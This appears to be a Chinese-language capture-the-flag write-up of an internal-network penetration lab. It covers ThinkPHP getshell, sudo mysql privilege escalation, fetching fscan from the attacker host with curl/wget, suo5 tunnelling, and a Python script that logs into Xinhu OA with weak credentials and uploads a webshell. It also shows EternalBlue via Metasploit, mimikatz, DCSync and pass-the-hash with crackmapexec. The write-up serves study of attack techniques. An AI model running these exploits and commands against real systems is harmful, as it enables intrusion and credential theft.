初步认识内网渗透流程
thinkphp外网打点
打开环境后尝试登陆无果,用fscan扫一下看看
fscan.exe -h 39.99.224.87
发现是think PHP漏洞
补充:
fscan:一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能
安装
这里需要下载go环境、fscan和proxifier,资源放链接里了,具体怎么操作就不赘述了,接下来就是配置go环境
在cmd命令行中输入代码:go env -w GOSUMDB=off
和go env -w GOPROXY=https://goproxy.cn,direct和go build -ldflags="-s -w " -trimpath
生成fscan.exe可执行文件
然后在该文件夹下就可以使用fscan了
简单的使用
fscan.exe -h 192.168.1.1/24 (默认使用全部模块)
fscan.exe -h 192.168.1.1/16 (B段扫描)
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
用莲花的thinkphp综合利用工具,然后getshell
补充:
下载后一直打不开,后面发现匹配的是java8的环境,有Javafx sdk,但我的是java18,自Java11以后就需要另外重新下载了
然后需要从cmd打开或者powershell,都可以
java "-Dfile.encoding=UTF-8" --module-path "D:\Java\javafx-sdk-17.0.13\lib" --add-modules "javafx.controls,javafx.fxml,javafx.web" -jar "D:\ThinkPHP综合工具\ThinkphpGUI.jar"
这里具体位置换成自己保存的就可以了
这样就可以正常打开了
接着用蚁剑连接
进去后发现找不到flag
提权
拿到了shell,但是没有root权限,这里就需要提权了,一般涉及到比较多比较容易的提权方式就是sudo和suid
这里可以看到需要用root的身份无密码执行mysql命令
补充:
sudo -l:用于列出当前用户可以使用 sudo 命令执行的所有命令。有助于了解用户的权限和可以执行的操作
命令如下
sudo mysql -e '\! 要执行的命令'
然后可以直接读取到root目录下面的flag1
补充:
//-e:允许你在命令行中直接指定要执行的SQL语句。
//\!:是一个特殊的命令,用于在MySQL客户端中执行系统命令。
接着查看root目录
得到flag01:flag{60b53231-
内网渗透
外网打了之后就到内网了
通过ifconfig可以发现存在局域网,并且可以出网,那么就传一个fscan上去,扫一下这个局域网,这里要记得给执行权限
这里出了点问题,fscan一直都传不上去,改权限了也不行
//kali、ubuntu、云服务器
python3 -m http.server <PORT>
//靶机
curl http://<kali-ip>:<PORT>/fscan --output fscan
或curl -o http://<kali-ip>:<PORT>/fscan
或wget http://<kali-ip>:<PORT>/fscan
扫完后到目录中查看,提取出下列内网信息
172.22.1.2 DC域控
172.22.1.21 MS17-010永恒之蓝
172.22.1.18 信呼OA系统
信呼OA
利用suo5进行代理,这里先在其网站目录上传suo5.php,然后用控制端直接连接,然后就可以访问信呼oa,弱口令admin/admin123登录后台
补充:
suo5项目
suo5 是一款高性能的 HTTP 代理隧道工具,基于双向的 Chunked-Encoding 构建。相比传统的隧道工具如 Neo-reGeorg,suo5 的性能可以达到其数十倍。suo5 支持全双工与半双工模式,传输性能接近 FRP,并且支持在 Nginx 反向代理和负载均衡场景中使用。此外,suo5 还支持 Java 4 到 Java 21 的全版本以及各大主流中间件服务,同时也支持 IIS 和 .NET Framework 2.0 以上的所有版本。
同时需要安装go环境,上面提过了,就不多说了
还需要Webview2 框架,安装时发现已经有了,需要过程的可以自己搜索
具体配置就不说了,与上面fscan相同
将内网代理到vps
接下来代理到本地,用proxifier
Profile-Proxy-Servers-Add
Profile-Proxification Rules-Add
然后就可以访问了
这里用弱口令admin/admin123登录后台
登录后在网上可以找到相关的漏洞
之后我用的是脚本上传文件
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=::',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('a.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('whoami');")
print(url_pre + filepath + "?1=system('whoami');")
print(r.text)
其中a.php是一句话木马
然后蚁剑连接就可以得到flag2为flag02: 2ce3-4813-87d4-
ms17010
前面整理了以后发现存在永恒之蓝,这里直接用msf来打
这里用正向去打
需要用到proxychains4
补充:
proxychains4
安装
sudo apt-get install proxychains4
修改配置文件
sudo vim /etc/proxychains.conf
这里根据实际情况而定
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
show options
set rhosts 172.22.1.21
run 或者 exploit
这里打永恒之蓝横向移动
DCSync攻击
补充:
DCSync的原理是利用域控制器之间的数据同步复制
DCSync是AD域渗透中常用的凭据窃取手段,默认情况下,域内不同DC每隔15分钟会进行一次数据同步,当一个DC从另外一个DC同步数据时,发起请求的一方会通过目录复制协议(MS- DRSR)来对另外一台域控中的域用户密码进行复制,DCSync就是利用这个原理,"模拟"DC向真实DC发送数据同步请求,获取用户凭据数据,由于这种攻击利用了Windows RPC协议,并不需要登陆域控或者在域控上落地文件,避免触发EDR告警,因此DCSync时一种非常隐蔽的凭据窃取方式
DCSync 攻击前提:
想进行DCSync 攻击,必须获得以下任一用户的权限:
Administrators 组内的用户
Domain Admins 组内的用户
Enterprise Admins 组内的用户域控制器的计算机帐户
即:默认情况下域管理员组具有该权限
获得的MS17-010这台机器加载mimikatz,并且本机是system权限
加载mimikatz
meterpreter> load kiwi
meterpreter> kiwi_cmd privilege::debug(提升权限,这个需要system权限)
导出域内哈希
由于获得了域管理员账户,直接通过哈希传递就能拿下域控,crackmapexec来进行哈希传递PTH
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
得到的flag3为e8f88d0d43d6}
所以flag是flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}